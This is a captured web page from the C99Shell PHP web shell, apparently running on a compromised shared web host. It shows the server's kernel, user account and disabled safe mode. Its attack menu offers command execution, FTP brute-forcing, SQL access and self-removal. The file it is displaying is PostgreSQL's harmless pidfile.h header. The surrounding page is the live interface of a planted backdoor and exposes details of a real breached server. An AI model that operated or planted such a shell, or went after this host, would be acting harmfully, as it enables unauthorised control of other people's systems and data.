!C99Shell v. 2.0 [PHP 7 Update] [25.02.2019]!

Software: Apache. PHP/7.3.33 

uname -a: Linux web25.us.cloudlogin.co 5.10.237-xeon-hst #1 SMP Mon May 5 15:10:04 UTC 2025 x86_64 

uid=233359(alpastrology) gid=888(tty) groups=888(tty),33(tape) 

Safe-mode: OFF (not secure)

/usr/pgsql-11/include/server/utils/   drwxr-xr-x
Free 6181.39 GB of 6262.59 GB (98.7%)
Home    Back    Forward    UPDIR    Refresh    Search    Buffer    Encoder    Tools    Proc.    FTP brute    Sec.    SQL    PHP-code    Update    Feedback    Self remove    Logout    


Viewing file:     pidfile.h (1.98 KB)      -rw-r--r--
Select action/file-type:
(+) | (+) | (+) | Code (+) | Session (+) | (+) | SDB (+) | (+) | (+) | (+) | (+) | (+) |
/*-------------------------------------------------------------------------
 *
 * pidfile.h
 *      Declarations describing the data directory lock file (postmaster.pid)
 *
 * Portions Copyright (c) 1996-2018, PostgreSQL Global Development Group
 * Portions Copyright (c) 1994, Regents of the University of California
 *
 * src/include/utils/pidfile.h
 *
 *-------------------------------------------------------------------------
 */
#ifndef UTILS_PIDFILE_H
#define UTILS_PIDFILE_H

/*
 * As of Postgres 10, the contents of the data-directory lock file are:
 *
 * line #
 *        1    postmaster PID (or negative of a standalone backend's PID)
 *        2    data directory path
 *        3    postmaster start timestamp (time_t representation)
 *        4    port number
 *        5    first Unix socket directory path (empty if none)
 *        6    first listen_address (IP address or "*"; empty if no TCP port)
 *        7    shared memory key (empty on Windows)
 *        8    postmaster status (see values below)
 *
 * Lines 6 and up are added via AddToDataDirLockFile() after initial file
 * creation; also, line 5 is initially empty and is changed after the first
 * Unix socket is opened.
 *
 * Socket lock file(s), if used, have the same contents as lines 1-5, with
 * line 5 being their own directory.
 */
#define LOCK_FILE_LINE_PID            1
#define LOCK_FILE_LINE_DATA_DIR        2
#define LOCK_FILE_LINE_START_TIME    3
#define LOCK_FILE_LINE_PORT            4
#define LOCK_FILE_LINE_SOCKET_DIR    5
#define LOCK_FILE_LINE_LISTEN_ADDR    6
#define LOCK_FILE_LINE_SHMEM_KEY    7
#define LOCK_FILE_LINE_PM_STATUS    8

/*
 * The PM_STATUS line may contain one of these values.  All these strings
 * must be the same length, per comments for AddToDataDirLockFile().
 * We pad with spaces as needed to make that true.
 */
#define PM_STATUS_STARTING        "starting"    /* still starting up */
#define PM_STATUS_STOPPING        "stopping"    /* in shutdown sequence */
#define PM_STATUS_READY            "ready   "    /* ready for connections */
#define PM_STATUS_STANDBY        "standby "    /* up, won't accept connections */

#endif                            /* UTILS_PIDFILE_H */

:: Command execute ::

Enter:
 
Select:
 

:: Search ::
  - regexp 

:: Upload ::
 
[ Read-Only ]

:: Make Dir ::
 
[ Read-Only ]
:: Make File ::
 
[ Read-Only ]

:: Go Dir ::
 
:: Go File ::
 

--[ c99shell v. 2.0 [PHP 7 Update] [25.02.2019] maintained by KaizenLouie | C99Shell Github | Generation time: 0.0128 ]--